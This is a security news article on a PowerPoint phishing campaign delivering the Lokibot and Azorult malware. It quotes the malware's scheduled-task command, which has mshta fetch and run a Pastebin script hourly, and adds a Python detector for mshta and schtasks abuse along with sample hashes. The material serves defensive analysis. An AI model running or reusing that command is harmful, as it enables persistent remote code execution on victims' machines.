A new malware campaign uses weaponized PowerPoint files to deliver either the Lokibot info stealer or the Azorult trojan.
Security researchers at Appriver spotted the campaign, which is built around PowerPoint attachments carrying an obfuscated script.
PowerPoint Malware Infection Chain
The infection starts with a simple email that has a PowerPoint file attached. To deceive victims, the weaponized PowerPoint files hide the lyrics of a popular Drake song inside a PowerShell command.
Once the PowerPoint attachment is opened, it runs a heavily obfuscated Visual Basic script. That script uses the Mshta.exe utility, which executes Microsoft HTML Applications (HTA), to reach out to a bit.ly-shortened link.
The script then checks whether Excel or Word is running and, if so, kills the process. It then uses Mshta.exe to create a scheduled task that fetches a Pastebin URL every 60 minutes:
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn (+main+) /tr "mshta hxxp:\\pastebin[.]com\raw\C5qNg3Dr" /F
The Pastebin URL hosts an encoded script. Once decoded, that script decides, based on the victim, whether to download the Lokibot info stealer or the Azorult trojan.
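The chain above leaves three recognisable traces on the endpoint: Mshta.exe started by an Office application, Mshta.exe handed a remote URL instead of a local .hta file, and a schtasks.exe /create whose action runs mshta against a remote URL on a timer. The following Python is an added example written for this article, not code from Appriver or the malware author. It runs that detection logic over constructed Sysmon-style process-creation records; the records, the rule names and the bit.ly placeholder link are assumptions, while the Pastebin path and the schtasks switches are the ones quoted above.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Office parents that should never legitimately launch mshta.exe (assumption: list is illustrative).
OFFICE_IMAGES = {"powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe"}
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed sample events (parent image, image, command line); not logs from the Appriver report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta hxxps://bit[.]ly/example-shortlink"},          # placeholder link (assumption)
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn (+main+) '
                r'/tr "mshta https://pastebin.com/raw/C5qNg3Dr" /F'},
    {"parent": r"C:\Windows\explorer.exe",                            # benign admin task
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc DAILY /tn Backup /tr "C:\Tools\backup.exe" /F'},
    {"parent": r"C:\Windows\explorer.exe",                            # local HTA, no remote URL
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Tools\helper.hta"},
]


@dataclass
class Finding:
    rule: str
    detail: str


def refang(text: str) -> str:
    """Turn report-style defanged indicators (hxxp, [.]) back into a matchable form."""
    return re.sub(r"(?i)hxxp", "http", text).replace("[.]", ".")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, so C:\\...\\MSHTA.EXE compares as mshta.exe."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace while keeping double-quoted arguments whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_schtasks(tokens: list[str]) -> dict:
    """Collect /switch value pairs from a schtasks command line; bare switches (/create, /F) map to True."""
    args: dict = {}
    i = 1  # tokens[0] is the schtasks image itself
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            key = tok.lower()
            nxt = tokens[i + 1] if i + 1 < len(tokens) else None
            if nxt is not None and not nxt.startswith("/"):
                args[key] = nxt
                i += 2
                continue
            args[key] = True
        i += 1
    return args


def detect(event: dict) -> list[Finding]:
    """Apply the three mshta/schtasks rules to one process-creation record."""
    findings: list[Finding] = []
    image = basename(event["image"])
    parent = basename(event["parent"])
    cmdline = refang(event["cmdline"])
    urls = REMOTE_URL.findall(cmdline)

    if image == "mshta.exe":
        if parent in OFFICE_IMAGES:
            findings.append(Finding("office_spawns_mshta", f"{parent} -> mshta.exe"))
        if urls:  # remote HTA: mshta will fetch and execute whatever the URL serves
            findings.append(Finding("mshta_remote_hta", urls[0]))

    if image == "schtasks.exe":
        args = parse_schtasks(tokenize(cmdline))
        action = args.get("/tr")
        if args.get("/create") and isinstance(action, str):
            action_tokens = tokenize(action)
            action_image = basename(action_tokens[0]) if action_tokens else ""
            action_urls = REMOTE_URL.findall(action)
            if action_image in {"mshta", "mshta.exe"} and action_urls:
                interval = ""
                if str(args.get("/sc", "")).upper() == "MINUTE":
                    interval = f" every {args.get('/mo', '1')} min"
                findings.append(Finding("schtasks_mshta_remote",
                                        f"task {args.get('/tn')}: {action_urls[0]}{interval}"))
    return findings


def scan(events: list[dict]) -> list[Finding]:
    """Run detect() over a batch of records and return every finding."""
    return [f for ev in events for f in detect(ev)]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.rule}] {finding.detail}")
```

The schtasks rule deliberately keys on the action (/tr) rather than the task name, since the name is attacker-chosen; pairing it with the interval from /sc MINUTE /mo gives the analyst the polling cadence that distinguishes a beacon from a one-off run.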
"Once decoded, this translates into a PowerShell script that contains a reference to Drake's 'Keke Do You Love Me' lyrics. This attacker 'Master X', retrieved from the metadata inside the PowerPoint, had a sense of humor when he was creating the invoke-expression cmdlet," reads the Appriver blog post.
Master X also obfuscates the download string to evade security monitoring tools. The two payloads are:
Lokibot – an information stealer, generally delivered through spam email, that collects credentials and other data from a wide range of applications.
Azorult – first spotted in 2016, a trojan that harvests and exfiltrates data from the compromised system.
Indicators of Compromise
Lokibot sample (SHA-256): 80c10ee5f21f92f89cbc293a59d2fd4c01c7958aacad15642558db700943fa22
Azorult sample (SHA-256): a3c8f58fd18e564ec11c247aede37b0be763d1fca46d0cbe5d032cf17e3a6bf3